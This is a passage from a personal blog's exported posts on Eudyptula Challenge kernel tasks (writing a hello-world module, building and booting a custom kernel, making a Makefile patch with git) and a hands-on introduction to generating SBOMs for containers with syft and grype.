HelloWorld.c -o HelloWorld.o Above Makefile is now good to compile and run our source code. It has got a variable that stores the compiler name, and it is used in HelloWorld.o target with ${CC} syntax. I believe you understand the rest.\nNow you can invoke make and it\u0026rsquo;ll compile the source and execute the binary in a single go. One key thing to observe here is, that when we run make multiple times without changing the source code, it is not recompiling the code. This saves us a lot of time. And this is exactly why make is so de-facto automation tool for such usecases. (not \u0026ldquo;de-facto\u0026rdquo;, but you get it, right?)\nNow, what about cleaning?? We gotta clean our mess. Although we don\u0026rsquo;t have huge mess, but mess is mess and one gotta take care of his own mess. So we are going to write another rule in our Makefile.\n# Deletes the executable binary file clean: rm -rf HelloWorld.o Now, anybody who will be using this, just needs to remember 2 commands:-\nmake : to actually compile and run the binary file. make clean : To remove the compiled binary file. Makefile for kernel Linux Kernel also uses makefiles (Plural; not singular) to make the building process relatively very easy for anybody. They just have to type 2 commands and a fresh new custom kernel will be ready for them. Although, this might take a lot of time depending upon what hardware you are running on and what files are you gonna compile.\nTake a look at the top few lines of the Makefile in the top most directory of source tree.\n# SPDX-License-Identifier: GPL-2.0 VERSION = 5 PATCHLEVEL = 19 SUBLEVEL = 0 EXTRAVERSION = -ExtraVersionText NAME = Superb Owl This tells about a lot of things related to version and name given to that version. We can see our EXTRAVERSION which I\u0026rsquo;ve changed in the file (for Task 3 - Eudyptula Challenge).\nReading further down, we have so many sections, separated with comment blocks. These comment blocks are simple and grep-able, give them a try. Once we are comfortable with the idea of Makefiles and linux kernel, we can now connect all the dots and understand how things are linked together.\nWe started with a .config file, that contains all the required kernel configurations. This file is then read by the top-level Makefile in linux kernel directory. This Makefile is responsible for building 2 major products: vmlinux \u0026amp; modules. To achive this, make goes recursively into the sub-directories of kernel source tree and builds and compiles everything. The list of directories is determined using the .config file\u0026hellip;. because that\u0026rsquo;s what we want to compile. According to the official kernel docs, people have four different relationships with the kernel Makefiles.\nSome will simply build kernel using commands like make menuconfig and make Some will work with device drivers or other kernel features and will have to deal with kbuild makefiles for each subsystem they are working on. A few will be working with architecture specific code and will be responsible for arch makefiles. And then, there are kbuild developers\u0026hellip;. people who work on the kernel build system itself. There are many things that a kernel developer needs to understand when he/she is working on kernel features. One of those many things is to understand kernel build makefiles. If you want, read more about important segments of a kernel makefile from official documentations here.1\nNow we know what makefile is, how it works and little bit about kernel makefile. Now the last part of the task - to make a patch of modified Makefile. This is very easy with git\u0026hellip; you know git right?\nJust do git diff Makefile in linux kernel source directory. Executing this command should give you output like below.\ndiff --git a/Makefile b/Makefile index 1a6678d81..25e909b50 100644 --- a/Makefile +++ b/Makefile @@ -2,7 +2,7 @@ VERSION = 5 PATCHLEVEL = 19 SUBLEVEL = 0 -EXTRAVERSION = -rc2 +EXTRAVERSION = -ExtraVersionText NAME = Superb Owl # *DOCUMENTATION* But this is not a patch\u0026hellip; it is just a diff, showing what things changed. To make a actual patch you need to do more than this.\n## After modifying the Makefile git add Makefile git commit -m \u0026#34;Modified Makefile\u0026#34; git format-patch -1 HEAD -- Makefile ## OUTPUT - 0001-modified-makefile.patch # COMMAND - cat 0001-modified-makefile.patch From 45176125f95a5606ab4334f334634e19492f4928 Mon Sep 17 00:00:00 2001 From: ayedaemon \u0026lt;ris3234@gmail.com\u0026gt; Date: Sat, 18 Jun 2022 10:54:16 +0530 Subject: [PATCH] modified makefile --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index b815ea3..7d97ece 100644 --- a/Makefile +++ b/Makefile @@ -1,6 +1,6 @@ VERSION = 5 PATCHLEVEL = 19 SUBLEVEL = 0 -EXTRAVERSION = -rc2 +EXTRAVERSION = -ExtraVersionText NAME = Superb Owl -- 2.36.1 Now this gives you a patch file in an email format. That\u0026rsquo;s convinient if you just want generate a patch and send it to someone using CLI mail client tools. Your work as a bug fixer/ feature developer/ etc is done once you have submitted the patch.\nSubmit the patch!! But where?? Linux kernel developers have also made automation scripts for you that actually finds the maintainers for a file.\n./scripts/get_maintainer.pl -f Makefile Output:-\nMasahiro Yamada \u0026lt;masahiroy@kernel.org\u0026gt; (maintainer:KERNEL BUILD + files below scripts/ (unless mai...) Michal Marek \u0026lt;michal.lkml@markovi.net\u0026gt; (maintainer:KERNEL BUILD + files below scripts/ (unless mai...) Nick Desaulniers \u0026lt;ndesaulniers@google.com\u0026gt; (reviewer:KERNEL BUILD + files below scripts/ (unless mai...) Nick Terrell \u0026lt;terrelln@fb.com\u0026gt; (maintainer:ZSTD) Alexei Starovoitov \u0026lt;ast@kernel.org\u0026gt; (supporter:BPF (Safe dynamic programs and tools)) Daniel Borkmann \u0026lt;daniel@iogearbox.net\u0026gt; (supporter:BPF (Safe dynamic programs and tools)) Andrii Nakryiko \u0026lt;andrii@kernel.org\u0026gt; (supporter:BPF (Safe dynamic programs and tools)) Martin KaFai Lau \u0026lt;kafai@fb.com\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) Song Liu \u0026lt;songliubraving@fb.com\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) Yonghong Song \u0026lt;yhs@fb.com\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) John Fastabend \u0026lt;john.fastabend@gmail.com\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) KP Singh \u0026lt;kpsingh@kernel.org\u0026gt; (reviewer:BPF (Safe dynamic programs and tools)) Nathan Chancellor \u0026lt;nathan@kernel.org\u0026gt; (supporter:CLANG/LLVM BUILD SUPPORT) Tom Rix \u0026lt;trix@redhat.com\u0026gt; (reviewer:CLANG/LLVM BUILD SUPPORT) linux-kbuild@vger.kernel.org (open list:KERNEL BUILD + files below scripts/ (unless mai...) linux-kernel@vger.kernel.org (open list) netdev@vger.kernel.org (open list:BPF (Safe dynamic programs and tools)) bpf@vger.kernel.org (open list:BPF (Safe dynamic programs and tools)) llvm@lists.linux.dev (open list:CLANG/LLVM BUILD SUPPORT) The above list gives you the recipients list for you patch. Before submitting your patch, please read the official kernel documentations2 to know mode about the patch submissions.\nhow do they apply my patch?? Maintainers (or the person you just submitted your patch) will check your patch and if everything is good, they\u0026rsquo;ll apply your patch to their codebase.\ngit provides an easy way to do that using the patch file\u0026hellip; just type below command and the patch will be applied.\ngit apply 0001-modified-makefile.patch Conclusion Linux kernel is very huge project which involves tons of people. This looks very chaotic and scary, but it works!! Among many other tools/scripts, Git and Makefiles are the 2 important tools this chaotic process relies upon. One should have good understanding about these tools to take part in the development process of kernel.\nhttps://www.kernel.org/doc/html/latest/kbuild/makefiles.html#the-kbuild-files\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/html/latest/process/submitting-patches.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/06/eudyptula-task-3/","summary":"This is Task 03 of the Eudyptula Challenge ------------------------------------------ Now that you have your custom kernel up and running, it\u0026#39;s time to modify it! The tasks for this round is: - take the kernel git tree from Task 02 and modify the Makefile to and modify the EXTRAVERSION field. Do this in a way that the running kernel (after modifying the Makefile, rebuilding, and rebooting) has the characters \u0026#34;-eudyptula\u0026#34; in the version string.","title":"Eudyptula Task3"},{"content":"This is Task 02 of the Eudyptula Challenge ------------------------------------------ Now that you have written your first kernel module, it\u0026#39;s time to take off the training wheels and move on to building a custom kernel. No more distro kernels for you, for this task you must run your own kernel. And use git! Exciting isn\u0026#39;t it! No, oh, ok... The tasks for this round is: - download Linus\u0026#39;s latest git tree from git.kernel.org (you have to figure out which one is his, it\u0026#39;s not that hard, just remember what his last name is and you should be fine.) - build it, install it, and boot it. You can use whatever kernel configuration options you wish to use, but you must enable CONFIG_LOCALVERSION_AUTO=y. - show proof of booting this kernel. Bonus points for you if you do it on a \u0026#34;real\u0026#34; machine, and not a virtual machine (virtual machines are acceptable, but come on, real kernel developers don\u0026#39;t mess around with virtual machines, they are too slow. Oh yeah, we aren\u0026#39;t real kernel developers just yet. Well, I\u0026#39;m not anyway, I\u0026#39;m just a script...) Again, proof of running this kernel is up to you, I\u0026#39;m sure you can do well. Hint, you should look into the \u0026#39;make localmodconfig\u0026#39; option, and base your kernel configuration on a working distro kernel configuration. Don\u0026#39;t sit there and answer all 1625 different kernel configuration options by hand, even I, a foolish script, know better than to do that! After doing this, don\u0026#39;t throw away that kernel and git tree and configuration file. You\u0026#39;ll be using it for later tasks, a working kernel configuration file is a precious thing, all kernel developers have one they have grown and tended to over the years. This is the start of a long journey with yours, don\u0026#39;t discard it like was a broken umbrella, it deserves better than that. What, why? Kernel is the main component of any operating system and is also referred as the \u0026ldquo;Heart of the Operating System\u0026rdquo;. It is at the core of all the layers present in OS and can have complete access to all the hardware (CPU, disk, RAM, etc). Therefore, it runs on very high privileges. Basically it handles most of the hardware related tasks (Allocate memory, CPU scheduling, etc) and most of the process related tasks (Copying file from/to disk, Uploading/Downloading, opening browser to read this blog, etc)\nWait, what? Does it have control to everything we do on our computers?\nA big YES and small no. It is responsible to send data across multiple resources in your system and it can intercept everything there. But it depends if it can understand what it sees.\nKernel has mainly 4 tasks:\nKeep track of the memory - who is using it and how much; And where. Decides who uses CPU, when and for how long Takes data from processes and passes sensible code to hardware for processing it and vise-versa. Receives requests via system calls (API calls; but not Web API calls) from processes. This is used to do low level stuff and build amazing tools like docker. Talking to kernel is difficult and can be dangerous if not used properly. Most of the times, user does not need to talk to kernel directly, and have got few layers of abstraction on top of it - Device drivers, system libraries, CLI shells, GUI shells (Graphical thing which comes up, when you start your system), etc.\nThis gives rise to the idea of 2 spaces - user space and kernel space. Kernel space is the memory segment that is used only by kernel and users stay out of it. Another is user space memory segment, where user can do all what he wants.\nThe rough mind map would look something like below\n[ [ [ [Hardware] --\u0026gt; Kernel ] --\u0026gt; OS ] --\u0026gt; Process(browser)] # If process fails in OS, damage is small and might be recovered by kernel. # If kernel crashes, Your system goes down. # If hardware fails, you cry!! This is the complete bundle which makes up your system. Now what I want to take out of this whole jibber-jabber is that a kernel is a piece of software that works with hardware and other user-friendly softwares to solve your problems or play games and have fun.\nSince it is a piece of software, we can download it and replace old versions with new versions (manually or via a script/program/whatever). Another option for tech savvy people is to custom compile it. There could be many reasons to compile a linux kernel by yourself, few possible reasons are:-\nYou want to know how it is done. You might want to brag about it and feel superior and very tech savvy. You want to face \u0026ldquo;I use arch BTW\u0026rdquo; community. (FYI, I use arch BTW!!) You want optimal performance on specific hardware and architecture. You might want to disable/enable some kernel features. You might want to add support for extra hardware. You are solving eudyptula challenge, just like me :) Regardless of why, knowing how to compile a linux kernel is very useful and cool.\nGetting the source code for kernel. Getting source code for kernel is very easy. You just need to go to kernel.org and download the required files. I\u0026rsquo;ll be compiling Linus Torvalds\u0026rsquo;s git tree source code on archlinux/archlinux vagrant box.1\n# Use git to download the linux kernel source code. (just the latest commit =\u0026gt; --depth=1) git clone --depth=1 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git Linux kernel is very huge software and might take up a minute to download (depends upon your connectivity). This is one of the reasons for why most of the extended functionalities are provided via loadable kernel modules. If you don\u0026rsquo;t know about kernel modules the read Eudyptula Task1 blog.\nInside the cloned directory, we have multiple files and sub-directories. Each sub-directory is for specified purpose like arch contains files for different system architecture and security contains files for selinux , apparmor and other security related files. In short, linux kernel is developed by thousands of developers in collaboration and not everybody knows about each file present in the source code and yet they have an understanding of where they have to make changes to achieve their goal. Very neat management!!\nCompiling Linux kernel Just like every configurable software, linux kernel also provide configuration support via .config file. We can either use other kernel\u0026rsquo;s config file or write a config file by ourselves.\nCreating own config file from scratch Creating own config file from scratch can be a bad idea for someone who is doing it for very first time. But if you still want to do it, I\u0026rsquo;m not gonna stop you. You can make the use of Makefile by typing make config from inside the kernel source code directory and then you\u0026rsquo;ll have to simply answer yes or no for all the configurable options that kernel supports. Read more here\nUsing existing config file You can copy the config file of your existing kernel and use it as a base config to make further changes. This is a very efficient method if there are only few changes you need to make. Most of the kernel developers have their own config files which they have fine-tuned in so many years. To know about how to get config file for your linux system read this stackoverflow thread. For my vagrant system, I can check my running kernel\u0026rsquo;s config file using below command\nls /proc/config.gz zcat /proc/config.gz | grep \u0026#34;.*CONFIG_\u0026#34; | wc -l # Output = 9128 There are total 9128 configurable options here and it is very impractical to make all the proper changes with a text editor in one go, so instead, we will do it with some TUI script. Below script will copy the config file to working directory and start the TUI for you. Navigate to linux source code directory and run the below script.\n# Copy config file and take a backup for later review zcat /proc/config.gz \u0026gt; .config cp .config ../old.config # Install requirements to run `make menuconfig` sudo pacman -S --noconfirm --needed\\ pkg-config ncurses \\ gcc \\ flex \\ bison # Update config file. make menuconfig Linux kernel has a lot of make options and the best way to check supporting make options is via make help command. After executing make menuconfig, a TUI will open in shell which will help you to update, save and load the new configuration. This command uses the .config file from current directory to pre-fill the old config options, this makes it very easy for us to just focus on what we want to change.\nFor my config file, I simply enabled the CONFIG_PRINTK_CALLER and CONFIG_LOCALVERSION_AUTO features of the kernel\u0026hellip; and then saved the file with a filename - new.config (I want to keep it backed up for future tasks). We can compare the changed values from the old .config and newer new.config and see the difference.\ndiff .config ../old.config | grep -i -E \u0026#39;localver|printk\u0026#39; # \u0026lt; CONFIG_LOCALVERSION=\u0026#34;ayedaemon\u0026#34; # \u0026gt; CONFIG_LOCALVERSION=\u0026#34;\u0026#34; # \u0026lt; CONFIG_PRINTK_CALLER=y # \u0026gt; # CONFIG_PRINTK_CALLER is not set Now we have very few steps left to be done. We need to compile the kernel, then install modules and finally, install kerrnel. Run below commands to get this done.\n# Update .config with newer config file mv -v new.config .config # Backup the newer config file cp -v .config ../new.config # Install some more dependencies sudo pacman -S --noconfirm --needed \\ bc \\ cpio # If on arch based distro or using my vagrantfile # Compile kernel (might require your input) - use -j4 to make it build faster make -j4 # Install modules (takes some time) - user -j4 to make it build faster sudo make modules_install -j4 If you are use LILO bootloader, then the kernel make file will do the job for you with this command - sudo make install. But if you are using GRUB, then you will have to make some manual steps by running below commands.\n# Copy kernel image to /boot sudo cp arch/x86_64/boot/bzImage /boot/vmlinuz-ayedaemonlinux # Copy system.map to /boot sudo cp System.map /boot/System-ayedaemonlinux.map # Copy config file to /boot (just to be safe) sudo cp .config /boot/ayedaemonlinux.kernel.config Let\u0026rsquo;s take a minute to see what we just did. After we configured the linux kernel using make and .config file, we compiled the kernel with our configuration requirements and then installed all the modules required. Once this is done, we got 2 important files we need :-\nvmlinuz =\u0026gt; Is the actual kernel file. Yes it is the kernel you were waiting for so long. If you fancy, do file /boot/vmlinuz-ayedaemonlinux and check the results. System.map =\u0026gt; This is the map file which stores the kernel symbol table information. Read more about it here Anyways, we need these files in our /boot/ directory so that our boot-loader can load our compiled kernel. But our boot-loader is dumb, it can not simply detect the files from /boot/ and show us options on the boot-loader screen, we will have to do that as well. You might also need to generate a initrd file depending upon what configurations you are using on your system. If you are following the steps from this blog, then you need initrd for sure. Initrd is the program that helps your kernel to load and boot up properly by providing the modules support that are not built into the kernel at compile time. In this blog, we have not compiled all the modules in the kernel that our kernel might need at boot time, so we will create a initrd file and then we can tell our boot loader about our custom kernel.\nUse mkinitcpio command to generate a initrd file and then update bootloader config using grub-mkconfig command. If you want this kernel to be default, then you\u0026rsquo;ll have to make proper changes to the boot config file. Read more about it from arch wiki or stackoverflow. If you are someone who prefers easy workarounds, you can also select the new kernel from the grub menu at boot time; Just make sure that GRUB_TIMEOUT variable (from /etc/default/grub) is not set to zero.\n# generate initramfs sudo mkinitcpio -k 5.18.0ayedaemon-g8ab2afa23bd1 -g /boot/initramfs-ayedaemonlinux.img # update grub config - add entry to boot menu sudo grub-mkconfig -o /boot/grub/grub.cfg # Setup grub boot order if you want to - else use the lazy way Output:-\n# sudo grub-mkconfig -o /boot/grub/grub.cfg Generating grub configuration file ... Found linux image: /boot/vmlinuz-linux Found initrd image: /boot/initramfs-linux.img Found fallback initrd image(s) in /boot: initramfs-linux-fallback.img Found linux image: /boot/vmlinuz-ayedaemonlinux Found initrd image: /boot/initramfs-ayedaemonlinux.img Warning: os-prober will not be executed to detect other bootable partitions. Systems on them will not be added to the GRUB boot configuration. Check GRUB_DISABLE_OS_PROBER documentation entry. done From the output of last command, we can see that my ayedaemonlinux was detected by grub and it also updated the /boot/grub/grub.cfg file with current detections. Now, lets reboot and hope everything works as expected. Select the custom kernel from grub menu if needed and boot into it. If successfull, you can check the kernel version and other information with uname command.\n# Before Reboot --\u0026gt; uname -a Linux archlinux 5.18.1-arch1-1 #1 SMP PREEMPT_DYNAMIC Mon, 30 May 2022 17:53:11 +0000 x86_64 GNU/Linux # After Reboot --\u0026gt; uname -a Linux archlinux 5.18.0ayedaemon-g8ab2afa23bd1 #1 SMP PREEMPT_DYNAMIC Wed Jun 1 16:54:51 UTC 2022 x86_64 GNU/Linux We just compiled our very own first kernel and since we have not changed much of the kernel parameters and no user-space programs are affected with this. But we get our name on the kernel tag!!\nArch is a rolling distro and the packages can be easily upgraded to latest versions available. No \u0026lt;package-name\u0026gt; too old kind of errors.\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/06/eudyptula-task-2/","summary":"This is Task 02 of the Eudyptula Challenge ------------------------------------------ Now that you have written your first kernel module, it\u0026#39;s time to take off the training wheels and move on to building a custom kernel. No more distro kernels for you, for this task you must run your own kernel. And use git! Exciting isn\u0026#39;t it! No, oh, ok... The tasks for this round is: - download Linus\u0026#39;s latest git tree from git.","title":"Eudyptula Task2"},{"content":"The concept of a Bill Of Materials (BOM) is well-established in traditional manufacturing as part of supply chain management. A manufacturer uses a BOM to track the parts it uses to create a product. If defects are later found in a specific part, the BOM makes it easy to locate affected products. In software industry, this concept is fairly new and is used to keep track of all the ingredients of the software.\nWhat is SBOM ?? A software bill of materials (SBOM) is a formal record of the components used to develop software and its software supply chain relationships, according to the National Telecommunications and Information Administration (NTIA). An SBOM covers both open source (OSS) and proprietary software, creating transparency into potential vulnerabilities and elements within the software. SBOMs can be used for vulnerability management and product integrity.\nAn SBOM is useful both to the builder (manufacturer) and the buyer (customer) of a software product. Builders often leverage available open source and third-party software components to create a product; an SBOM allows the builder to make sure those components are up to date and to respond quickly to new vulnerabilities. Buyers can use an SBOM to perform vulnerability or license analysis, both of which can be used to evaluate risk in a product.\nWhy SBOM ?? There could be multiple usages of SBOM, like\neasy End-Of-Life management for dependencies and product itself. License obligations and policy compliance. For developers, it can help to unbloat the software by identifying the BOM and clean up unused things or can use it for quality assurance. Identify and eliminate vulnerabilities from early stages (more shift left) There are many artifacts that can provide SBOM information and this information can be correlated and used together to provide better security insights. These artifacts could be the source code, executables, published softwares, or in devops world, containers!!\nContainers are easy way to package and deliver software; Container is like an encapsulated artifact. Here we can get SBOM for Application dependencies, Secret code, OS packages, Licenses, File data, Configuration files, Container meta-data, etc. When it comes to security, it’s important to know every part of the system. SBOM gives you a clear list of components that help in monitoring every part for vulnerabilities.\nExisting SBOM formats A new SBOM can be created and published in various formats including HTML, CSV, PDF, Markdown, and plain text. SBOM formats are still in development and new formats might arise in future that can address specific problems in a better way. Currently used formats are - Software Package Data Exchange (SPDX), Software Identification (SWID) Tags, and Cyclone DX.\nSPDX Also known as ISO/IEC 5962:2021, SPDX is spearheaded by The Linux Foundation. It is an open standard for describing SBOM information related to provenance, licensing, and security.\nSWID Tags This format identifies and reports software components under four categories across the development lifecycle:\nCorpus Tags: Identifies and describes components in a pre-installation stage. Primary Tags: Identifies and describes components in a post-installation stage. Patch Tags: Identifies and describes the patch. Supplement Tags: Allows only the tag creator to modify corpus, primary, and patch tags. Cyclone DX Managed by Cyclone DX’s core working group, it is designed for application security contexts. Cyclone DX is considered a lightweight standard with features of both SPDX and SWID. It includes four data fields:\nBOM Metadata: Description of the supplier, manufacturer, component, and compilation tools. Components: Complete information of a proprietary and open-source components along with licensing requirements. Services: A list of external APIs that the software may invoke. Dependencies: All forms of relationship within the supply chain. Don\u0026rsquo;t talk, show!! For the demo, I\u0026rsquo;ve created a basic flask application that says hello and have containerized it into 3 different base images - ubuntu, alpine and distroless.\nCONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 783618b1c6df sbom_distroless \u0026#34;/usr/bin/python3.9 …\u0026#34; 9 seconds ago Up 7 seconds sbom_distroless_demo 3ed64aef4767 sbom_alpine \u0026#34;python app.py\u0026#34; 16 seconds ago Up 14 seconds sbom_alpine_demo fe18c421777a sbom_ubuntu \u0026#34;python3 app.py\u0026#34; 19 seconds ago Up 17 seconds sbom_ubuntu_demo We can check the size of the container image using docker images command.\nsbom_distroless latest 6ef7ccd61f84 38 minutes ago 166MB sbom_alpine latest e7e71b412cf5 About an hour ago 161MB sbom_ubuntu latest 9e2166292230 About an hour ago 573MB If you want to get more details about the size of each layer then you can use docker history \u0026lt;image\u0026gt; command. More information about the running container (process) can be obtained using docker inspect \u0026lt;container\u0026gt;.\nAll these commands are good, but they do not provide any information about the application and its dependencies. Docker has recently announced its experimental feature - docker sbom, that allows us to generate the SBOM of a container image. Today, it does this by scanning the layers of the image using the Syft project but in future it may read the SBOM from the image itself or elsewhere.\nLet\u0026rsquo;s generate a SBOM for our containers by directly using the syft project.\nsyft sbom_distroless ✔ Loaded image ✔ Parsed image ✔ Cataloged packages [69 packages] NAME VERSION TYPE Flask 2.1.2 python Jinja2 3.1.2 python MarkupSafe 2.1.1 python Werkzeug 2.1.2 python base-files 11.1+deb11u3 deb boto3 1.23.9 python botocore 1.26.9 python certifi 2022.5.18.1 python charset-normalizer 2.0.12 python click 8.1.3 python dash 0.5.11+git20200708+dd9ef66-5 deb idna 3.3 python importlib-metadata 4.11.4 python itsdangerous 2.1.2 python jmespath 1.0.0 python libbz2-1.0 1.0.8-4 deb libc-bin 2.31-13+deb11u3 deb libc6 2.31-13+deb11u3 deb libcom-err2 1.46.2-2 deb libcrypt1 1:4.4.18-4 deb libdb5.3 5.3.28+dfsg1-0.8 deb libexpat1 2.2.10-2+deb11u3 deb libffi7 3.3-6 deb libgcc-s1 10.2.1-6 deb libgomp1 10.2.1-6 deb libgssapi-krb5-2 1.18.3-6+deb11u1 deb libk5crypto3 1.18.3-6+deb11u1 deb libkeyutils1 1.6.1-2 deb libkrb5-3 1.18.3-6+deb11u1 deb libkrb5support0 1.18.3-6+deb11u1 deb liblzma5 5.2.5-2.1~deb11u1 deb libmpdec3 2.5.1-1 deb libncursesw6 6.2+20201114-2 deb libnsl2 1.3.0-2 deb libpython3.9-minimal 3.9.2-1 deb libreadline8 8.1-1 deb libsqlite3-0 3.34.1-3 deb libssl1.1 1.1.1n-0+deb11u2 deb libstdc++6 10.2.1-6 deb libtinfo6 6.2+20201114-2 deb libtirpc3 1.3.1-1 deb libuuid1 2.36.1-8+deb11u1 deb netbase 6.3 deb openssl 1.1.1n-0+deb11u2 deb pip 22.0.4 python pip 22.1.1 python python-dateutil 2.8.2 python python3-distutils 3.9.2-1 deb requests 2.27.1 python s3transfer 0.5.2 python setuptools 58.1.0 python six 1.16.0 python tzdata 2021a-1+deb11u3 deb urllib3 1.26.9 python wheel 0.37.1 python zipp 3.8.0 python zlib1g 1:1.2.11.dfsg-2+deb11u1 deb By default, syft parses and analyses the final layer of the container and displays the tabular result on the standard output (stdout). This is good if we just want to see the SBOM ourselves and not want to share it with other tools or people. To save the output to a file you can use --file option and you can also specify another formats that are widely used by community with -o or --output flag. Below bash script will create cyclonedx-json , github-json, spdx-jsonand syft-json format SBOMs and also store them in their respective files.\nmkdir -p generated_sboms; for i in sbom_{ubuntu,distroless,alpine}; do mkdir -p generated_sboms/$i echo $i; syft $i \\ -o syft-json=generated_sboms/$i/syft.json \\ -o spdx-json=generated_sboms/$i/spdx.json \\ -o github-json=generated_sboms/$i/github.json \\ -o cyclonedx-json=generated_sboms/$i/cyclonedx.json done Output of the above script provides us with package count for each image and it is clear that the ubuntu has most of them as it is a full fledged distro with a lot of system files, manpages, etc\u0026hellip; and distroless images have the least one. The idea of distroless is somewhat over-hyped in the world of containers and sometimes it can be related with security ideas of minimum attack surface. Here is a RedHat article that try to give a clear understanding of the benefits of distroless containers and myths around it.\nsbom_ubuntu ✔ Loaded image ✔ Parsed image ✔ Cataloged packages [265 packages] sbom_distroless ✔ Loaded image ✔ Parsed image ✔ Cataloged packages [69 packages] sbom_alpine ✔ Loaded image ✔ Parsed image ✔ Cataloged packages [71 packages] And it\u0026rsquo;ll create a directory with organised json files\n# tree generated_sboms/ generated_sboms/ ├── sbom_alpine │ ├── cyclonedx.json │ ├── github.json │ ├── spdx.json │ └── syft.json ├── sbom_distroless │ ├── cyclonedx.json │ ├── github.json │ ├── spdx.json │ └── syft.json └── sbom_ubuntu ├── cyclonedx.json ├── github.json ├── spdx.json └── syft.json Now we have our sbom files and we can share these files to other people who need it. It can be our customers, external auditors, Incident response team, etc etc\u0026hellip; Also we can use these files with another tool that can check these images for vulnerabilities. One such tool is grype - A vulnerability scanner for container images and filesystems that works exceptionally with Syft. Below script will generate grype results for all the 3 images using their respective spdx.json files.\nmkdir -p grype_results; for i in sbom_{ubuntu,distroless,alpine}; do echo $i; mkdir -p grype_results/$i grype sbom:./generated_sboms/sbom_ubuntu/spdx.json \\ -o json \\ --file grype_results/$i/all.json done Like all static analysers, this tool might generate tons of false positives. Apart from this, grype tool provides tons of configuration features that can come in handy for automations and several other usecases. A lot of other commercial and open-source tools are arising that can leverage SBOMs and can help to solve problems around licencing and policy compliene, security audits, quality assurance, etc.\nSBOM misconception There are few misconeptions or myths about SBOMs like it can :-\nbe a roadmap to the attacker ? require source code disclosure ? expose my intellectual properties ? .. etc Here is a NTIA publication that covers explaination of some such myths V/S facts.\n","permalink":"https://ayedaemon.github.io/post/2022/05/hands-on-intro-to-sbom/","summary":"The concept of a Bill Of Materials (BOM) is well-established in traditional manufacturing as part of supply chain management. A manufacturer uses a BOM to track the parts it uses to create a product. If defects are later found in a specific part, the BOM makes it easy to locate affected products. In software industry, this concept is fairly new and is used to keep track of all the ingredients of the software.","title":"Hands-on Intro to SBOM"},{"content":"What is this? The Eudyptula Challenge is a series of programming exercises for the Linux kernel, that start from a very basic “Hello world” kernel module, moving on up in complexity to getting patches accepted into the main Linux kernel source tree.\nUnfortunately, this project is not accepting any new applicants right now. So I decided to gather tasks details from other online sources and complete them locally.\nTask-1 This is Task 01 of the Eudyptula Challenge ------------------------------------------ Write a Linux kernel module, and stand-alone Makefile, that when loaded prints to the kernel debug log level, \u0026#34;Hello World!\u0026#34; Be sure to make the module be able to be unloaded as well. The Makefile should build the kernel module against the source for the currently running kernel, or, use an environment variable to specify what kernel tree to build it against. Linux provides a powerful and expansive API for applications, but sometimes that’s not enough. Interacting with a piece of hardware or conducting operations that require access to privileged information in the system can require a kernel module. In this task we have to write a kernel module that basically prints \u0026ldquo;Hello World!\u0026rdquo;.\nWhat is a Kernel Module? A Linux kernel module is a piece of compiled binary code that is inserted directly into the Linux kernel, running at ring 0, the lowest and least protected ring of execution in the x86–64 processor. Code here runs completely unchecked but operates at incredible speed and has access to everything in the system.\nA loadable kernel module (LKM) is a mechanism for adding code to, or removing code from, the Linux kernel at run time. They are ideal for device drivers, enabling the kernel to communicate with the hardware without it having to know how the hardware works. The alternative to LKMs would be to build the code for each and every driver into the Linux kernel.\nWithout this modular capability, the Linux kernel would be very large, as it would have to support every driver that would ever be needed for the system to work properly. You would also have to rebuild the kernel every time you wanted to add new hardware or update a device driver.\nKernel modules run in kernel space and applications run in user space, and both kernel space and user space have their own unique memory address spaces that do not overlap. This approach ensures that applications running in user space have a consistent view of the hardware, regardless of the hardware platform. The kernel services are then made available to the user space in a controlled way through the use of system calls. The kernel also prevents individual user-space applications from conflicting with each other or from accessing restricted resources through the use of protection levels (e.g., superuser versus regular user permissions).\nPrepare system for building LKMs The system must be prepared to build kernel code, and to do this you must have the Linux headers installed on your device. On a typical Linux desktop machine you can use your package manager to locate the correct package to install. For example, under 64-bit Centos7 you can use the below code. Sometimes the package manager provides multiple version of headers, then you must install the headers for the exact version of your kernel build.\n# Update system sudo yum update -y # Install headers sudo yum install -y kernel-devel kernel-headers # Check headers ls /usr/src/kernels/$(uname -r) Write first module - Hello World The LKM code is very different from the regular user-space C program. Typical computer programs are reasonably straightforward. A loader allocates the memory for the program, then loads the program and other shared libraries into memory. Instruction Execution begins at some entrypoint (typically main() in C/C++ programs). On exit, OS identifies any memory leaks and frees lost memory to pool.\nThe LKMs are not applications - For a start there is no main() and no printf() functions!!. They also do not have any automatic cleanup. Interestingly, they also do not have any floating-point support. In LKMs, the kernel module have atleast 2 entrypoint like functions; These functions executes at loading or unloading of the LKM.\nThe above can be a lot to digest all at once but it is important that they are addressed. Now, we can wrap our minds around the below code and understand how it works.\nTo start with, we need a HelloWorld.c file with 2 function definitions - hello_world_init() and hello_world_exit(). We then register first function to be executed when the LKM is loaded in the memory and the later is registered to be executed at unloading of the LKM. There are few extra functions that configure the metadata for the created module.\n#include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Eudyptula task1\u0026#34;); static int hello_world_init(void) { printk(KERN_DEBUG \u0026#34;Hello World!\\n\u0026#34;); return 0; } static void hello_world_exit(void) { printk(KERN_DEBUG \u0026#34;Bye Bye World!\\n\u0026#34;); } module_init(hello_world_init); module_exit(hello_world_exit); In kernel space, we do not have access to printf() functions, instead we have a very similar in usage function called printk()1, and you can call it from anywhere withing the LKM code. Read more about printk() from here.2\nNow that we’ve constructed the simplest possible module, let’s understand the important parts in detail:\nThe “includes” cover the required header files necessary for Linux kernel development.\nMODULE_LICENSE can be set to a variety of values depending on the license3 of the module. Other following 2 lines are 